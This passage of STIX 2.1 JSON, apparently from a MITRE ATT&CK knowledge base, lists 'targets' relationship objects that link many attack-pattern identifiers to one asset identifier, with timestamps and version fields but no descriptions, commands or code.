"attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb46aecb-38bc-4bba-9b32-e4ae9c583d9a", "created": "2024-07-01T10:37:15.827301", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827304", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3c1945f-694a-499e-917e-4eb6b09f2df8", "created": "2024-07-01T10:37:15.827311", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827313", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08ab8dfb-52c1-4923-9cb7-2a83842ff68d", "created": "2024-07-01T10:37:15.827321", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827324", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43abcdbb-822c-4710-896d-dcad24e50598", "created": "2024-07-01T10:37:15.827332", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827334", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50c7fb7f-c9b2-49b2-96fc-733d7a93b9c8", "created": "2024-07-01T10:37:15.827342", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827344", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b98e8cf1-3d49-4ba1-a752-efeda874504a", "created": "2024-07-01T10:37:15.827352", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--07ef906c-b820-4153-982c-98ee3526861f", "created": "2024-07-01T10:37:15.827362", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827364", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1bb4075-f3d3-48cb-a1db-bdb19268dc7f", "created": "2024-07-01T10:37:15.827372", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827374", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--268782b6-221a-4536-bf8f-6ec517982c28", "created": "2024-07-01T10:37:15.827382", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827385", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcfcf584-ae13-45bc-be53-c6f99fc58f41", "created": "2024-07-01T10:37:15.827392", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827394", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0228c831-adf0-4efa-8a4c-ff762c3078ea", "created": "2024-07-01T10:37:15.827402", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827404", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26703cd7-a168-4234-815d-eca3a45b18a7", "created": "2024-07-01T10:37:15.827412", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827414", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--54c796ad-c925-40c0-be20-41a14ef69271", "created": "2024-07-01T10:37:15.827422", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827424", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ca616769-9077-41f0-8af3-0670475bb6a9", "created": "2024-07-01T10:37:15.827432", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827434", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4e3283c-cd98-4fa3-a45f-f40efa2a29ea", "created": "2024-07-01T10:37:15.827442", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827444", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d265d3c9-cd1b-41fe-9486-c87861ba24cc", "created": "2024-07-01T10:37:15.827452", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827454", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29e1f3a0-8b84-4ee8-8294-e0ecafb214e0", "created": "2024-07-01T10:37:15.827462", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827464", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc2d9bf8-34d8-49a4-80e6-aa0162627dde", "created": "2024-07-01T10:37:15.827472", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827474", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--af145e01-76d4-4442-8724-d17fb76a7708", "created": "2024-07-01T10:37:15.827482", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827484", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa796349-0d79-4390-8af5-4177bb0c9239", "created": "2024-07-01T10:37:15.827492", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827494", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9858eae-5347-4e02-ad09-b61318140aa5", "created": "2024-07-01T10:37:15.827502", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827504", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3e250c7-7669-4264-8cc3-dc0b716c0438", "created": "2024-07-01T10:37:15.827512", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827514", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--14de2b9a-0a78-4cc4-9cd9-b17ed494112f", "created": "2024-07-01T10:37:15.827522", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827524", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--12f75bb8-c95b-438c-ad51-2bc96ab71f96", "created": "2024-07-01T10:37:15.827532", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827534", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6117520f-cfc3-4ee0-8c04-7246d5dbedd2", "created": "2024-07-01T10:37:15.827542", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827544", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a9e9a57-9d3a-4ec4-83e1-74fc27177188", "created": "2024-07-01T10:37:15.827552", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827554", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5e799e1-f78f-422d-b763-b354ccd1a879", "created": "2024-07-01T10:37:15.827562", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827564", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1cc1c5f-1bce-44a4-8603-6ea41a8680e7", "created": "2024-07-01T10:37:15.827572", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827574", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47bce920-4ae6-4d96-9371-c9008b7296e3", "created": "2024-07-01T10:37:15.827582", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827584", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff42c5ee-47fc-4208-ba20-16d0fe191f09", "created": "2024-07-01T10:37:15.827592", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827594", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1e771a30-7195-400d-9600-2f52aa59f9bf", "created": "2024-07-01T10:37:15.827602", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827604", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5a7bf223-8695-48e8-8194-a8dc043d7bc2", "created": "2024-07-01T10:37:15.827612", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827614", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6ececb5-a6ef-43aa-8801-94ec415d4549", "created": "2024-07-01T10:37:15.827622", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827624", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46147217-e586-40d0-bd62-6160d79a8505", "created": "2024-07-01T10:37:15.827632", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827634", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b10c2b15-d732-445d-8981-1176e884d1a2", "created": "2024-07-01T10:37:15.827642", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827644", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50044ecd-592c-4056-a654-92c7f645de7f", "created": "2024-07-01T10:37:15.827651", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827653", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ba8e769-76f6-4c99-893c-c96fc091fc88", "created": "2024-07-01T10:37:15.827661", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827663", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2480c8e4-8150-46d3-9d9d-32f27aadeb20", "created": "2024-07-01T10:37:15.827672", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827674", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4cb799e0-8c26-4c56-9d2e-d08f30460490", "created": "2024-07-01T10:37:15.827681", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827684", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db42fd52-d9bf-4122-a025-81cdc06aedb8", "created": "2024-07-01T10:37:15.827691", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827694", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8e1ad3bd-0901-4e29-b8dc-e33ca1e08631", "created": "2024-07-01T10:37:15.827701", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827704", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": 